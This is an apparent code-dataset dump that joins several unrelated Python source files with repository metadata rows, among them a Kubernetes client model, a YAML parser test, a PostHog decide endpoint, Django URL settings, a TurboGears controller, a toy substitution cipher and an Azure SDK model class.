"""Gets the last_observed_time of this CoreV1EventSeries. # noqa: E501
Time of the last occurrence observed # noqa: E501
:return: The last_observed_time of this CoreV1EventSeries. # noqa: E501
:rtype: datetime
"""
return self._last_observed_time
@last_observed_time.setter
def last_observed_time(self, last_observed_time):
"""Sets the last_observed_time of this CoreV1EventSeries.
Time of the last occurrence observed # noqa: E501
:param last_observed_time: The last_observed_time of this CoreV1EventSeries. # noqa: E501
:type last_observed_time: datetime
"""
self._last_observed_time = last_observed_time
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CoreV1EventSeries):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, CoreV1EventSeries):
return True
return self.to_dict() != other.to_dict()
| 30.222222
| 124
| 0.605188
|
6d59da701657159ec9a44c85d6c9fa8c6bed7d93
| 1,510
|
py
|
Python
|
test/test_parser_yaml.py
|
fschrader1992/python-odml
|
48d83b7a3d4514100649b2338d3b018ba1db03fd
|
[
"BSD-4-Clause"
] | null | null | null |
test/test_parser_yaml.py
|
fschrader1992/python-odml
|
48d83b7a3d4514100649b2338d3b018ba1db03fd
|
[
"BSD-4-Clause"
] | null | null | null |
test/test_parser_yaml.py
|
fschrader1992/python-odml
|
48d83b7a3d4514100649b2338d3b018ba1db03fd
|
[
"BSD-4-Clause"
] | null | null | null |
import os
import unittest
import yaml
from odml.tools import dict_parser
from odml.tools.parser_utils import ParserException, InvalidVersionException
class TestYAMLParser(unittest.TestCase):
def setUp(self):
dir_path = os.path.dirname(os.path.realpath(__file__))
self.basepath = os.path.join(dir_path, "resources")
self.yaml_reader = dict_parser.DictReader()
def test_missing_root(self):
filename = "missing_root.yaml"
message = "Missing root element"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.safe_load(raw_data)
with self.assertRaises(ParserException) as exc:
_ = self.yaml_reader.to_odml(parsed_doc)
self.assertIn(message, str(exc.exception))
def test_missing_version(self):
filename = "missing_version.yaml"
message = "Could not find odml-version"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.safe_load(raw_data)
with self.assertRaises(ParserException) as exc:
_ = self.yaml_reader.to_odml(parsed_doc)
self.assertIn(message, str(exc.exception))
def test_invalid_version(self):
filename = "invalid_version.yaml"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.safe_load(raw_data)
with self.assertRaises(InvalidVersionException):
_ = self.yaml_reader.to_odml(parsed_doc)
| 30.816327
| 76
| 0.684768
|
cb96d13bd64021fde5b0bbb2a972c35262e833a4
| 2,497
|
py
|
Python
|
posthog/api/decide.py
|
Kacppian/posthog
|
faa0696e3219f9162a3fd59501e126a7cd79ec8c
|
[
"MIT"
] | null | null | null |
posthog/api/decide.py
|
Kacppian/posthog
|
faa0696e3219f9162a3fd59501e126a7cd79ec8c
|
[
"MIT"
] | null | null | null |
posthog/api/decide.py
|
Kacppian/posthog
|
faa0696e3219f9162a3fd59501e126a7cd79ec8c
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.http import JsonResponse, HttpRequest
from django.views.decorators.csrf import csrf_exempt
from typing import Optional, List, Any, Dict
from posthog.utils import cors_response
from urllib.parse import urlparse
from posthog.models import FeatureFlag, Team
import json
import base64
import secrets
def _load_data(data: str) -> Dict[str, Any]:
return json.loads(
base64.b64decode(data.replace(" ", "+") + "===")
.decode("utf8", "surrogatepass")
.encode("utf-16", "surrogatepass")
)
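# Note on the decoding above (stdlib behaviour, added comment): '+' in posted base64
# can arrive as a space after URL decoding, hence the replace(); appending '==='
# guarantees sufficient padding, and b64decode tolerates surplus '=' by default.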
def feature_flags(request: HttpRequest) -> List[str]:
if request.method != "POST" or not request.POST.get("data"):
return []
data = _load_data(request.POST["data"])
team = Team.objects.get_cached_from_token(data["token"])
flags_enabled = []
feature_flags = FeatureFlag.objects.filter(team=team, active=True, deleted=False)
for feature_flag in feature_flags:
if feature_flag.distinct_id_matches(data["distinct_id"]):
flags_enabled.append(feature_flag.key)
return flags_enabled
def parse_domain(url: Any) -> Optional[str]:
return urlparse(url).hostname
@csrf_exempt
def get_decide(request: HttpRequest):
response = {
"config": {"enable_collect_everything": True},
"editorParams": {},
"isAuthenticated": False,
"supportedCompression": ["gzip", "lz64"],
}
if request.user.is_authenticated:
team = request.user.team_set.get()
permitted_domains = ["127.0.0.1", "localhost"]
for url in team.app_urls:
hostname = parse_domain(url)
if hostname:
permitted_domains.append(hostname)
if (parse_domain(request.headers.get("Origin")) in permitted_domains) or (
parse_domain(request.headers.get("Referer")) in permitted_domains
):
response["isAuthenticated"] = True
editor_params = {}
if request.user.toolbar_mode == "toolbar":
editor_params["toolbarVersion"] = "toolbar"
if settings.DEBUG:
editor_params["jsURL"] = "http://localhost:8234/"
response["editorParams"] = editor_params
if not request.user.temporary_token:
request.user.temporary_token = secrets.token_urlsafe(32)
request.user.save()
response["featureFlags"] = feature_flags(request)
return cors_response(request, JsonResponse(response))
| 32.428571
| 85
| 0.655186
|
ee9729140a851b030f09698e5c872875b5c5cfa6
| 191
|
py
|
Python
|
launch.py
|
DmitriyKhudiakov/Compressor_calc_data
|
d623e54d01c8f157a4aedc2b8cab6e1a1ff5e44d
|
[
"MIT"
] | null | null | null |
launch.py
|
DmitriyKhudiakov/Compressor_calc_data
|
d623e54d01c8f157a4aedc2b8cab6e1a1ff5e44d
|
[
"MIT"
] | null | null | null |
launch.py
|
DmitriyKhudiakov/Compressor_calc_data
|
d623e54d01c8f157a4aedc2b8cab6e1a1ff5e44d
|
[
"MIT"
] | null | null | null |
import sys
from PyQt5.QtWidgets import QApplication
from classes.MainWidget import MainWidget
def start():
app = QApplication(sys.argv)
win = MainWidget()
win.show()  # without show() the window is created but never displayed
sys.exit(app.exec_())
if __name__ == "__main__":
start()
| 19.1
| 41
| 0.732984
|
ac6231b0727d4b0a0c7064a2e6755d3a3257f162
| 186
|
py
|
Python
|
API/app/main/schema/user_schema.py
|
Niewidzialny84/PathFighters
|
9cf9cfcde60cb5e57c5c68ba995c34955b78caf9
|
[
"MIT"
] | 9
|
2021-08-19T16:57:13.000Z
|
2022-01-25T16:14:11.000Z
|
API/app/main/schema/user_schema.py
|
Niewidzialny84/PathFighters
|
9cf9cfcde60cb5e57c5c68ba995c34955b78caf9
|
[
"MIT"
] | 29
|
2021-10-18T15:37:53.000Z
|
2022-01-26T08:28:37.000Z
|
API/app/main/schema/user_schema.py
|
Niewidzialny84/PathFighters
|
9cf9cfcde60cb5e57c5c68ba995c34955b78caf9
|
[
"MIT"
] | 1
|
2022-01-19T01:53:11.000Z
|
2022-01-19T01:53:11.000Z
|
from .. import ma
class UserSchema(ma.Schema):
class Meta:
fields = ('id', 'username', 'email', 'password')
user_schema = UserSchema()
users_schema = UserSchema(many=True)
| 23.25
| 56
| 0.666667
|
a555200e54ee7d49549a65611fec9b75e3fb3fa8
| 1,524
|
py
|
Python
|
FUNDASTORE/urls.py
|
GabrielB-07/FundaStore-cgb
|
b509a9743a651344b32dd7a40ab789f1db48e54b
|
[
"CC0-1.0"
] | null | null | null |
FUNDASTORE/urls.py
|
GabrielB-07/FundaStore-cgb
|
b509a9743a651344b32dd7a40ab789f1db48e54b
|
[
"CC0-1.0"
] | null | null | null |
FUNDASTORE/urls.py
|
GabrielB-07/FundaStore-cgb
|
b509a9743a651344b32dd7a40ab789f1db48e54b
|
[
"CC0-1.0"
] | null | null | null |
"""FUNDASTORE URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf import settings
from django.conf.urls import include
from django.conf.urls.static import static
from FUNDASTORE.APPS.PRODUCTOS.views import *
from FUNDASTORE.APPS.PRINCIPAL.views import *
urlpatterns = [
path('admin/', admin.site.urls),
path('accounts/',include('django.contrib.auth.urls')),
path('',inicio, name='inicio'),
path('Nosotros',nosotros, name='nosotros'),
path('Contactenos', ver_contactenos, name='principal-contactenos'),
path('ListarProductos',listarProductos, name='listarProductos'),
path('AgregarProductos',agregarProductos),
path('EditarProductos/<int:id>',editarProducto, name='editarProducto'),
path('EliminarProductos/<int:id>',eliminarProducto, name='eliminarProducto'),
]
urlpatterns+=static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)
| 39.076923
| 81
| 0.736877
|
8744adf97536399d9779ff129157dc68ae2648d3
| 18,324
|
py
|
Python
|
bot_project/buzzbot/identity_controllers.py
|
pbarton666/buzz_bot
|
9f44c66e8ecb10e231f70989421f164d7a55029a
|
[
"MIT"
] | null | null | null |
bot_project/buzzbot/identity_controllers.py
|
pbarton666/buzz_bot
|
9f44c66e8ecb10e231f70989421f164d7a55029a
|
[
"MIT"
] | null | null | null |
bot_project/buzzbot/identity_controllers.py
|
pbarton666/buzz_bot
|
9f44c66e8ecb10e231f70989421f164d7a55029a
|
[
"MIT"
] | null | null | null |
import turbogears as tg
from turbogears import controllers, expose, flash, identity, widgets, validate, redirect, validators, error_handler
from turbogears import *
from cherrypy import request, response
from datetime import datetime
import time
from string import join
import random
from sqlobject.sqlbuilder import *
import model
from model import *
from string import join
import random
# from buzzbot import json
import logging
log = logging.getLogger("buzzbot.controllers")
#create a widget list for fields in the search specification form
class SearchFields(widgets.WidgetsList):
id = widgets.HiddenField()
name=widgets.TextField(label= "Name:")
description = widgets.TextField(label="Description:")
#client_id = widgets.TextField(label="Client ID:")
targetword = widgets.TextField(label="Target word:")
searchstring = widgets.TextField(label="Find content containing:")
maxurls = widgets.TextField(label="Max. URLs to Search:")
maxcontent = widgets.TextField(label="Max. content blocks to find:")
eliminationwords = widgets.TextField(label="...but not containing:")
#...these will be displayed on a custom form that instansiates the TableForm widget
class SearchForm(widgets.TableForm):
template= "buzzbot.templates.searchTemplate"
searchFormInstance = SearchForm(fields = SearchFields.declared_widgets,
action = "Post",
submit_text="Save")
class tableFormTemplate(widgets.TableForm):
pass
#set up a widget list and form for the verify search delete screen
class verifyDeleteFields(widgets.WidgetsList):
id = widgets.HiddenField()
name = widgets.TextField()
cancel = widgets.Button()
verifyDeleteFormInstance = widgets.TableForm(fields = verifyDeleteFields.declared_widgets,
action = "Post", submit_text="OK")
class checkBoxList(widgets.WidgetsList):
pass
class Root(controllers.RootController):
@expose(template="buzzbot.templates.welcome")
@identity.require(identity.not_anonymous())
def index(self):
import time
log.debug("Happy TurboGears Controller Responding For Duty")
flash("Your application is now running")
testme()
return dict(now=time.ctime())
@expose(template="buzzbot.templates.login")
def login(self, forward_url=None, previous_url=None, *args, **kw):
if not identity.current.anonymous and identity.was_login_attempted() \
and not identity.get_identity_errors():
raise redirect(tg.url(forward_url or previous_url or '/', kw))
forward_url = None
previous_url = request.path
msg = "You can use guest/guest if you don't yet have a login."
if identity.was_login_attempted():
msg = "The credentials you supplied were not correct or did not grant access to this resource."
elif identity.get_identity_errors():
msg = "You must provide your credentials before accessing this resource."
else:
msg = "Please log in."
forward_url = request.headers.get("Referer", "/")
forward_url="/buildLP"
response.status = 403
return dict(message=msg, previous_url=previous_url, logging_in=True,
original_parameters=request.params, forward_url=forward_url)
@expose()
def logout(self):
identity.current.logout()
raise redirect("/")
@expose(template="buzzbot.templates.edit_search_form")
#deprecated, but keep for use as template
def testProjectFields1(self):
submit_action = "/saveProjectFields/"
#set up some values to send to the form
b=model.Search.select()
someb = b[0]
#inject these values into the form created from the ProjectFields widget list
return dict(form=searchFormInstance, values = someb, action = submit_action)
@expose()
#deprecated, but keep for use as template
def saveProjectFields(self, **kwargs):
#elements of the form have same names as the class attributes, so we can
# use them to set the database parameters.
#here, we're updating an existing search
parameter_1 = 10
if parameter_1 != '0':
b= Search.get(parameter_1)
b.set(**kwargs)
else:
#this command tells the Search object to add it.
return "Search = (" + join(["%s : %s " %item for item in kwargs.iteritems()])
raise redirect("/index")
@expose(template="buzzbot.templates.viewContent")
def viewContent(self,searchNum):
conn = Content._connection
#change this statement to = searchNum
#sqlstmt = "SELECT * from content WHERE search_id > " + str(searchNum)
b=Content.select()
return dict(cont = b)
@expose(template="buzzbot.templates.verifyDeleteSearch")
def verifyDeleteSearch(self, searchNum):
#calls up a page to verify deletion of a search
b = Search.get(searchNum)
submit_action = "/deleteSearch/%s" %searchNum
#inject these values into the form created from the verifyDeleteFields widget list
return dict(form=verifyDeleteFormInstance, values = b, action = submit_action)
#to do: verify syntax here; write up a short data in/out piece for notes;
# do pop-up window for confirmation; ensure foreign keys work
def deleteSearch(self, number):
#actually deletes a search after user confirmation
if int(number) >0: #if number is less than zero, user cancelled action
Search.delete(int(number))
#returns user to main search view page
raise redirect("/viewSearches/" + str(random.randint(1,10000)))
@expose(template="buzzbot.templates.verifyDeleteLP")
def verifyDeleteLP(self, LPid):
#calls up a page to verify deletion of a search
b = Search.get(LPid)
submit_action = "/deleteLP/%s" %LPid
#inject these values into the form created from the verifyDeleteFields widget list
return dict(form=verifyDeleteFormInstance, values = b, action = submit_action)
#to do: verify syntax here; write up a short data in/out piece for notes;
# do pop-up window for confirmation; ensure foreign keys work
def deleteLP(self, number):
#actually deletes a search after user confirmation
if int(number) >0: #if number is less than zero, user cancelled action
Listeningpost.delete(int(number))
#returns user to main search view page
raise redirect("/viewLPs/" + str(random.randint(1,10000)))
#lists all the searches made by this user, those saved by others in the same group, and those
# saved as client-worthy (by an admin)
@expose(template="buzzbot.templates.viewSearches")
def viewSearches(self):
#figure out who this user is and where he belongs
thisID = identity.current.identity()
thisUser = thisID.user_id
thisUserGroup = thisID.groups
#grab all the searches - this is a bit inefficient, but we won't have millions for a while
searches = model.Search.select()
searchesToDisplay = [] #an array of search objects to pass to the controller
editURL = [] # ...and a parallel array that flags that editing is allowed
deleteURL =[] # ...and one to signal that deletion is allowed
allUsers = User.select()
#there's probably a more efficient way to do this, but this puts user's own searches on top
for s in searches:
if s.userid == thisUser: #give the user full run of his own searches
searchesToDisplay.append(s)
editURL.append("/editsearch/" + str(s.id) + "?owner")
deleteURL.append("/verifyDeleteSearch/" + str(s.id))
#if the search belongs to someone else and it's public, consider adding it
for s in searches:
if s.userid != thisUser and s.is_public:
ownerSearchObj = User.selectBy(id=s.userid)  #selectBy takes keyword filters; a positional arg would bind to the connection
thisOwner = ownerSearchObj[0]
thisOwnerGroup = thisOwner.groups
if thisOwnerGroup == thisUserGroup:
searchesToDisplay.append(s)
editURL.append("/editsearch/" + str(s.id)+ "?nonOwner")
deleteURL.append("")
#now find client-worthy searches (perhaps added by an admin)
for s in searches:
if s.is_client_worthy:
#screen out searches we've already added
addMe=True
for d in searchesToDisplay:
if d.id == s.id:
addMe=False
if addMe:
searchesToDisplay.append(s)
editURL.append("/editsearch/" + str(s.id)+ "?built_in")
deleteURL.append("")
#create a widgetList to pass in; each will be named after the search it represents
widgetList = widgets.WidgetsList() #a true widgetsList object
wNameList=[] #a list of the widget names
for s in searchesToDisplay:
#for testing, if it has an even number check the box
if s.id%2 ==1: #note: % is the modulus operator:
mydefault = True #note: this will not take a 1 in place of true
else:
mydefault = False
wName = "ck_" + str(s.id)
#w = widgets.CheckBox(name = wName, default = mydefault, validators=validators.Bool)
w = widgets.CheckBox(name = wName, default = mydefault)
#for some reason the default value doesn't stick unless we specify it separately
w.default = mydefault
widgetList.append(w)
wNameList.append(wName)
#prepare the objects for display; this instantiates a TableForm widget, passing in our check boxes
myFormWidget = widgets.TableForm(fields = widgetList,
method = "post",
submit_text = "OK",
name = "formName"
)
#this directs the returned form to the processSearchInput method
submit_action="/processSearchInput"
return dict(form=myFormWidget, searches=searchesToDisplay, editlink = editURL,
deletelink = deleteURL, action = submit_action)
@expose()
def processSearchInput(self, **kwargs):
#the return is a tuple of (key, value) tuples for all the checked boxes, something like:
# {'ck_13': u'on', 'ck_11": u'on'}
args = kwargs.items()
searchOn=[]
for a in args:
boxName, state = args[a] #parse the tuple
searchOn.append(int(boxname[3:])) #strip the integer from the name
#now we have an array of integers indicating which searches go with this LP
#so...delete existing LP-search pairs
a=1
#...and add the current ones
a=0
return(dict[a])
#Controller to allow the user to edit the search parameters. Our named
# parameter_1 is the search number. If its value is 0 (a new search), we'll grab a null row
# which is conveniently populated with default values. This requires manual specification
# of the search in the db. If this hasn't been set up, the form comes up blank.
#lists all the Listening Posts owned by this user, those saved by others in the same group, and those
# saved as client-worthy (by an admin)
@expose(template="buzzbot.templates.viewLPs")
def viewLPs(self):
#figure out who this user is and where he belongs
thisID = identity.current.identity()
thisUser = thisID.user_id
thisUserGroup = thisID.groups
#grab all the listening posts - this is a bit inefficient, but we won't have millions for a while
lps = model.Listeningpost.select()
        lpsToDisplay = [] #an array of listening post objects to pass to the template
editURL = [] # ...and a parallel array that flags that editing is allowed
deleteURL =[] # ...and one to signal that deletion is allowed
allUsers = User.select()
#there's probably a more efficient way to do this, but this puts user's own searches on top
        for s in lps:
            if s.userid == thisUser: #give the user full run of his own listening posts
                lpsToDisplay.append(s)
                editURL.append("/editLP/" + str(s.id) + "?owner")
                deleteURL.append("/verifyDeleteLP/" + str(s.id))
        #if the listening post belongs to someone else and it's public, consider adding it
        for s in lps:
            if s.userid != thisUser and s.is_public:
                ownerSearchObj = User.selectBy(id=s.userid)
thisOwner = ownerSearchObj[0]
thisOwnerGroup = thisOwner.groups
if thisOwnerGroup == thisUserGroup:
lpsToDisplay.append(s)
editURL.append("/editLP/" + str(s.id)+ "?nonOwner")
deleteURL.append("")
        #now find client-worthy listening posts (perhaps added by an admin)
        for s in lps:
            if s.is_client_worthy:
                #screen out listening posts we've already added
addMe=True
for d in lpsToDisplay:
if d.id == s.id:
addMe=False
if addMe:
lpsToDisplay.append(s)
editURL.append("/editLP/" + str(s.id)+ "?admin")
deleteURL.append("")
        #create a widgetList to pass in; each will be named after the listening post it represents
widgetList = widgets.WidgetsList() #a true widgetsList object
wNameList=[] #a list of the widget names
        for s in lpsToDisplay:
            #for testing, check the box if the listening post has an odd id
            if s.id % 2 == 1: #note: % is the modulus operator
                mydefault = True #note: this will not take a 1 in place of True
else:
mydefault = False
wName = "ck_" + str(s.id)
#w = widgets.CheckBox(name = wName, default = mydefault, validators=validators.Bool)
w = widgets.CheckBox(name = wName, default = mydefault)
#for some reason the default value doesn't stick unless we specify it separately
w.default = mydefault
widgetList.append(w)
wNameList.append(wName)
        #prepare the objects for display; this instantiates a TableForm widget, passing in our check boxes
myFormWidget = widgets.TableForm(fields = widgetList,
method = "post",
submit_text = "OK",
name = "formName"
)
        #this directs the returned form to the processSearchInput method
        submit_action="/processSearchInput"
        return dict(form=myFormWidget, searches=lpsToDisplay, editlink = editURL,
                    deletelink = deleteURL, action = submit_action)
@expose(template="buzzbot.templates.edit_search_form")
def editsearch(self, parameter_1, tg_errors=None):
try:
submit_action = "/save_searchedit/%s" %parameter_1
b = model.Search.get(int(parameter_1))
except:
b = []
return dict(form=edit_search_form, values = b, action = submit_action)
#Process the user input here. Elements of the form have the same names as the
    # class attributes (i.e., database columns) so we can just pass the kwargs dict
# to the database management routines (SQLObject)
@expose()
@error_handler(edit_search_form)
@validate(form= edit_search_form)
def save_searchedit(self, parameter_1, **kwargs):
#Form field parameters are strings, but some of the database fields are ints so
# we'll need to convert them. This is a bit ugly but it works
        items = kwargs.items() #this gets a list of (key, value) tuples
for thisItem in items:
k, v = thisItem #parse the tuple
try:
thisValueAsNumber = int(v) #if this doesn't raise an error, the field is a number
kwargs[k]=thisValueAsNumber #update the dict by assigning a new value to the key
except:
pass #if we have raised an error, we have text and will leave it alone
#now we'll inject the data into the database.
        if parameter_1 != '0': #this updates an existing record
            b = Search.get(int(parameter_1))
b.set(**kwargs)
else:
#we have a new entry, and we'll let the database autoindex its id; this passes in
# a dict structure of form elements. NB all db columns must be spec'd in widgetList.
model.Search(**kwargs)
#this brings control back to the viewSearches screen w/ a random number to ensure refresh
raise redirect("/buildLP/" + str(random.randint(1,10000)))
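    # Illustrative only: the coercion loop in save_searchedit turns form input
    # like {'searchname': 'daily buzz', 'max_results': '25'} (field names
    # hypothetical) into {'searchname': 'daily buzz', 'max_results': 25}
    # before it reaches the SQLObject set()/constructor call.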
def fixDB(self):
mydata = model.Content.select()
for d in mydata:
d.set(user_id=1)
d.set(search_id=1)
| 49.126005
| 116
| 0.590482
|
cf79f13ad44ac716032680a899813140e9054a17
| 2,060
|
py
|
Python
|
fluss0r.py
|
tamasgal/fluss0r
|
6a006a8f9fd1b3abc60bec1bafb155a67100f225
|
[
"MIT"
] | null | null | null |
fluss0r.py
|
tamasgal/fluss0r
|
6a006a8f9fd1b3abc60bec1bafb155a67100f225
|
[
"MIT"
] | null | null | null |
fluss0r.py
|
tamasgal/fluss0r
|
6a006a8f9fd1b3abc60bec1bafb155a67100f225
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Fluss0r.
Usage:
fluss0r.py
fluss0r.py [-i -s]
fluss0r.py -h | --help
fluss0r.py --version
Options:
-i Interactive session.
-s Activate speech output.
-h --help Show this screen.
--version Show version.
"""
from __future__ import unicode_literals
import os
from docopt import docopt
FROM_MAP = "abcdefghijklmnopqrstuvwxyzäöüß"
TO_MAP = "ökpgihdfeßbvszücwtmrälqyxnuaoj"
def translate(text, map1, map2):
map1 += map1.upper()
map2 += map2.upper()
def translate_char(c):
try: return map2[map1.index(c)]
except ValueError: return c
return "".join(translate_char(c) for c in text)
class UniversalTranslator(object):
def __init__(self, from_map, to_map):
self.from_map = from_map + from_map.upper()
self.to_map = to_map + to_map.upper()
def __call__(self, text, decrypt=False):
if decrypt:
return self.decrypt(text)
return self.encrypt(text)
def encrypt(self, text):
return self._project(text, self.from_map, self.to_map)
def decrypt(self, text):
return self._project(text, self.to_map, self.from_map)
def _project(self, text, code1, code2):
return "".join(self._project_char(c, code1, code2) for c in text)
def _project_char(self, char, code1, code2):
try:
return code2[code1.index(char)]
except ValueError:
return char
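def _demo_round_trip():
    """Illustrative only (not part of the original script): encrypting and
    then decrypting with the same maps returns the input unchanged, because
    FROM_MAP and TO_MAP contain the same characters with no repeats."""
    translator = UniversalTranslator(FROM_MAP, TO_MAP)
    secret = translator.encrypt("hallo welt")
    assert translator.decrypt(secret) == "hallo welt"
    return secret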
def run_loop(prompt, say=False):
translator = UniversalTranslator(FROM_MAP, TO_MAP)
try:
while True:
text = input(prompt)
encrypted = translator.encrypt(text)
print(encrypted)
if say:
                os.system("say {0}".format(encrypted))
except (KeyboardInterrupt, EOFError):
raise SystemExit
if __name__ == '__main__':
arguments = docopt(__doc__, version='fluss0r 0.0')
prompt = ""
if arguments['-i']:
prompt = "> "
run_loop(prompt, arguments['-s'])
| 24.819277
| 73
| 0.621845
|
5f1b52b59d9db2c44fccb1f5cf6c3ef9de176595
| 2,679
|
py
|
Python
|
preprocessing/surf_map.py
|
sniafas/Features2d-demo
|
e18995f610a97bb9afcb29655fa82cc5decded82
|
[
"MIT"
] | null | null | null |
preprocessing/surf_map.py
|
sniafas/Features2d-demo
|
e18995f610a97bb9afcb29655fa82cc5decded82
|
[
"MIT"
] | null | null | null |
preprocessing/surf_map.py
|
sniafas/Features2d-demo
|
e18995f610a97bb9afcb29655fa82cc5decded82
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import subprocess
import json
from json_tricks.np import load
if __name__ == '__main__':
## #----------------- # ##
buildings = []
bestQuery = ''
    expBuildings = subprocess.check_output("ls -x surf_experiments/", shell=True)
exp_path = "surf_experiments/"
    # Inlier threshold taken from the F1-score peak of the PRF plot
inlier_thres = 10
### Append available experimental buildings ###
for j in expBuildings.splitlines():
buildings.append(j)
#experimental building ids
ids = ['03','13','15','22','39','60']
# Parsing for every building / individual inlier threshold
for buildingIdx in ids:
expCounter = 0
Precision = 0
Recall = 0
F = 0
totalP = 0
totalR = 0
totalF = 0
bestP = 0
bestR = 0
bestF = 0
meanPrecision = 0
meanRecall = 0
meanF = 0
for query in buildings:
print "Opening %s" % query
with open(exp_path + query + '/results.json') as s:
results = json.load(s)
with open(exp_path + query + '/classRank.json') as cR:
classResults = json.load(cR)
# Query Build Class == current building
if query[8:10] == buildingIdx:
N_results = 0
for resultValid in results['Results']['__ndarray__']:
# Matches >= the inlier threshold are counted
if resultValid[0][2] >= inlier_thres:
N_results +=1
if N_results > 0:
C_results = 0
# Retrieved Images from the same class query building
for classValid in classResults['ClassRank']['__ndarray__']:
if classValid[0][2] >= inlier_thres:
C_results +=1
if N_results > 0 and C_results > 0 :
#Precision, Recall, Fscore metrics
Precision = float(C_results) / N_results
totalP = totalP + Precision
print "\tExperiment Precision %.3f" % Precision
# 15 images/building, query image is omitted
Recall = float(C_results) / 14
totalR = totalR + Recall
print "\tExperiment Recall %.3f" % Recall
F = float((2 * Precision * Recall)) / (Precision + Recall)
print "\tExperiment F Measure %.3f" % F
totalF = totalF + F
print "Total Precision %.3f" % totalP
print "Total Recall %.3f" % totalR
print "Total F %.3f \n" % totalF
expCounter += 1
else:
pass
meanPrecision = totalP / expCounter
meanRecall = totalR / expCounter
meanF = totalF / expCounter
print "Mean Precision %.3f" % meanPrecision
print "Mean Recall %.3f" % meanRecall
print "Mean F %.3f" % meanF
log = open("surf_results/map/surf_MAP_" + str(buildingIdx),'w')
log.write("%.3f,%.3f,%.3f,%s" % (meanPrecision,meanRecall,meanF,str(buildingIdx)))
log.close()
| 27.90625
| 85
| 0.633819
|
f6458bd8f65e8f0942242dd4a2cfb41748eb3ba1
| 5,735
|
py
|
Python
|
azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/azure_iaa_sclassic_compute_vm_protected_item.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2018-07-23T08:59:24.000Z
|
2018-07-23T08:59:24.000Z
|
azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/azure_iaa_sclassic_compute_vm_protected_item.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2018-11-29T14:46:42.000Z
|
2018-11-29T14:46:42.000Z
|
azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/azure_iaa_sclassic_compute_vm_protected_item.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2018-08-28T14:36:47.000Z
|
2018-08-28T14:36:47.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .azure_iaa_svm_protected_item import AzureIaaSVMProtectedItem
class AzureIaaSClassicComputeVMProtectedItem(AzureIaaSVMProtectedItem):
"""IaaS VM workload-specific backup item representing the Classic Compute VM.
All required parameters must be populated in order to send to Azure.
    :param backup_management_type: Type of backup management for the backed
up item. Possible values include: 'Invalid', 'AzureIaasVM', 'MAB', 'DPM',
'AzureBackupServer', 'AzureSql', 'AzureStorage', 'AzureWorkload',
'DefaultBackup'
:type backup_management_type: str or
~azure.mgmt.recoveryservicesbackup.models.BackupManagementType
:param workload_type: Type of workload this item represents. Possible
values include: 'Invalid', 'VM', 'FileFolder', 'AzureSqlDb', 'SQLDB',
'Exchange', 'Sharepoint', 'VMwareVM', 'SystemState', 'Client',
'GenericDataSource', 'SQLDataBase', 'AzureFileShare', 'SAPHanaDatabase'
:type workload_type: str or
~azure.mgmt.recoveryservicesbackup.models.DataSourceType
:param container_name: Unique name of container
:type container_name: str
:param source_resource_id: ARM ID of the resource to be backed up.
:type source_resource_id: str
:param policy_id: ID of the backup policy with which this item is backed
up.
:type policy_id: str
:param last_recovery_point: Timestamp when the last (latest) backup copy
was created for this backup item.
:type last_recovery_point: datetime
:param backup_set_name: Name of the backup set the backup item belongs to
:type backup_set_name: str
:param create_mode: Create mode to indicate recovery of existing soft
deleted data source or creation of new data source. Possible values
include: 'Invalid', 'Default', 'Recover'
:type create_mode: str or
~azure.mgmt.recoveryservicesbackup.models.CreateMode
:param protected_item_type: Required. Constant filled by server.
:type protected_item_type: str
:param friendly_name: Friendly name of the VM represented by this backup
item.
:type friendly_name: str
:param virtual_machine_id: Fully qualified ARM ID of the virtual machine
represented by this item.
:type virtual_machine_id: str
:param protection_status: Backup status of this backup item.
:type protection_status: str
:param protection_state: Backup state of this backup item. Possible values
include: 'Invalid', 'IRPending', 'Protected', 'ProtectionError',
'ProtectionStopped', 'ProtectionPaused'
:type protection_state: str or
